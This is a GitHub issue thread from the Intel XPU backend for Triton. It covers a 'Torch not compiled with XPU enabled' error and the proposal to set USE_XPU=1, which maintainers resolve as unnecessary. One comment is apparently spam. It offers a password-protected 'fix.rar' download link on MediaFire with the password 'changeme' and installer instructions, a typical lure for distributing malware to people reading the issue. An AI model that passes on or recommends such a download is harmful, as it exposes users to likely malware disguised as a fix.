### ISSUE TITLE
`compile-pytorch-ipex.sh` should use `USE_XPU=1` by default

### ISSUE THREAD

**Issue by anmyachev** [intel/intel-xpu-backend-for-triton#2014]
Logs:
```bash
~/intel-xpu-backend-for-triton$ python python/tutorials/01-vector-add.py 
Traceback (most recent call last):
  File "/home/jovyan/intel-xpu-backend-for-triton/python/tutorials/01-vector-add.py", line 85, in <module>
    x = torch.rand(size, device='xpu')
  File "/home/jovyan/.conda/envs/test/lib/python3.9/site-packages/torch/xpu/__init__.py", line 118, in _lazy_init
    raise AssertionError("Torch not compiled with XPU enabled")
AssertionError: Torch not compiled with XPU enabled
```

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by pbchekin** [comment]
Are you sure this is the root cause? I do not see `USE_XPU=1` in CI but it works. A possible root cause can be that pytorch was installed in the local environment from pypi without xpu support.

**Comment by anmyachev** [comment]
> Are you sure this is the root cause? I do not see `USE_XPU=1` in CI but it works. A possible root cause can be that pytorch was installed in the local environment from pypi without xpu support.

I double checked, `USE_XPU` build option is enabled by default if it finds sycl. So there is no such problem, you are right.
